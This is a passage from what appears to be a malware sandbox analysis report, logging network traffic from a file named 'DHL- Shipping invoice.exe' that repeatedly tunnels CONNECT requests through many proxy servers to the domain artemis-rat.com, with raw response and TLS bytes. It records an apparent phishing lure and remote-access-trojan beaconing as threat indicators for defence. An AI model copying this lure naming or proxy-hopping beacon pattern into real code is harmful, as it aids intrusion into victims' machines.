                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.765373945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.453069925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.841043949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.590414047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.806145906 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            343192.168.2.451235104.23.126.8806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.217237949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.304164886 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            344192.168.2.451248104.17.210.9806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.217309952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.304385900 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            345192.168.2.45106462.3.6.7631286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.217310905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.796623945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.750114918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.359416962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.563000917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.750231028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            346192.168.2.45117346.35.9.110806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.217384100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            347192.168.2.45109889.35.237.18780806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.217457056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.795147896 CET75INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Length: 0
                            Mar 12, 2024 08:37:01.641223907 CET103INHTTP/1.1 400 Bad Request
                            Content-Type: text/plain; charset=utf-8
                            Connection: close
                            Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                            Data Ascii: 400 Bad Request


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            348192.168.2.45121938.162.6.10331286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.217469931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.515569925 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            349192.168.2.45026572.206.181.12341456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.217588902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            350192.168.2.451230172.67.35.15806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.218677998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.306418896 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            351192.168.2.450135103.78.96.146806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.218677998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.232207060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.880624056 CET19INHTTP/1.1 200 OK
                            Mar 12, 2024 08:37:06.967677116 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 f0 06 22 b7 42 12 7a b9 b2 52 be 59 78 1c d9 e1 21 7e 82 e0 0e 2c 24 80 bc c2 13 53 9f 01 8d 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                            Data Ascii: e"BzRYx!~,$S*,+0/$#('=<5/Uartemis-rat.com#
                            Mar 12, 2024 08:37:07.360167980 CET1286INData Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7
                            Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5|0F<Arp'~00tP'S"0*H0G10UUS
                            Mar 12, 2024 08:37:07.360181093 CET238INData Raw: 30 02 86 1d 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e 63 72 74 30 32 06 03 55 1d 1f 04 2b 30 29 30 27 a0 25 a0 23 86 21 68 74 74 70 3a 2f 2f 63 72 6c 2e 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e
                            Data Ascii: 0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0*H4(v1z!R>tA=5\_|W&o[Fh7okz7%Qh
                            Mar 12, 2024 08:37:07.360207081 CET1286INData Raw: 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 f6 20 cd 63 b2 7e c4 2b 09 75 89 da d1 3c 2e 72 4f 36 1a a1 9e 44 d0 cd 9b a6 23 08 3f 97 a1 a7 9e 5a a5 f7 09 94 ad 5d 76 5d 28 56 d1 1a 66 51 51 07 7b de
                            Data Ascii: WAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*
                            Mar 12, 2024 08:37:07.360228062 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 f0 06 23 f5 49 75 67 d7 fd 76 d2 89 b5 f3 08 a5 4e 81 b6 84 13 c8 7b 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                            Data Ascii: C?e#IugvN{DOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                            Mar 12, 2024 08:37:07.712001085 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 f0 06 23 f5 49 75 67 d7 fd 76 d2 89 b5 f3 08 a5 4e 81 b6 84 13 c8 7b 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                            Data Ascii: C?e#IugvN{DOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                            Mar 12, 2024 08:37:07.712182999 CET498INData Raw: 49 fd 5a 9a ca 01 23 ac 84 80 2b 02 8c 99 97 eb 49 6a 8c 75 d7 c7 de b2 c9 97 9f 58 48 57 0e 35 a1 e4 1a d6 fd 6f 83 81 6f ef 8c cf 97 af c0 85 2a f0 f5 4e 69 09 91 2d e1 68 b8 c1 2b 73 e9 d4 d9 fc 22 c0 37 1f 0b 66 1d 49 ed 02 55 8f 67 e1 32 d7
                            Data Ascii: IZ#+IjuXHW5oo*Ni-h+s"7fIUg2&p=gm=|42njoK;7D~lF!fUl)f[wIH(3rS5b$9~*AR?,( xm,:G59&oL<g[bU,d=8yH
                            Mar 12, 2024 08:37:07.712439060 CET1286INData Raw: 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 f6 20 cd 63 b2 7e c4 2b 09 75 89 da d1 3c 2e 72 4f 36 1a a1 9e 44 d0 cd 9b a6 23 08 3f 97 a1 a7 9e 5a a5 f7 09 94 ad 5d 76 5d 28 56 d1 1a 66 51 51 07 7b de
                            Data Ascii: WAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*
                            Mar 12, 2024 08:37:08.014535904 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 83 92 63 fe 68 9d 53 cc 49 47 31 7c ec 48 d9 87 7d 07 25 c6 38 e7 25 c4 55 cd 1e c3 9f 7b b3 7e 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 1c dc 1a e5 70 ee 8f 2a 81 51 03 3e 4c ad de 0f 6a eb 65 6a 37
                            Data Ascii: %! chSIG1|H}%8%U{~(p*Q>Ljej7_g^
                            Mar 12, 2024 08:37:08.394484043 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 1f 00 c0 f5 e2 4c 01 87 de 27 16 6c f6 c4 30 8c b6 e0 9d 01 28 06 83 e5 70 b2 9f 26 ab 76 c4 0a 8b 97 eb 9c 0e d5 8a 40 53 8e 55 16 ef de 1d 9f c4 22 ce 70 9a d7 dd 27 73 47 1f 2c 14 2c c7 43 7a 59 a9 7c 39 5b
                            Data Ascii: L'l0(p&v@SU"p'sG,,CzY|9[9&,r3#.e#HNRun-@]"Ry56:D *I+l2%DiLr)"|(gC+A


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            352192.168.2.45117094.23.83.53558066484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.218890905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.687391996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.202917099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            353192.168.2.45028237.187.73.7413856484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.224942923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.232172966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.250556946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.252510071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:24.343686104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:36.442447901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:48.455367088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:12.452991009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:00.536926031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            354192.168.2.45018647.116.126.12031286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.225342989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.528974056 CET767INHTTP/1.1 403 Forbidden
                            Server: Beaver
                            Cache-Control: no-cache
                            Content-Type: text/html
                            Content-Length: 635
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            355192.168.2.451293104.24.136.68806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.235692024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.322712898 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            356192.168.2.451306104.16.226.6806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.242510080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.330459118 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
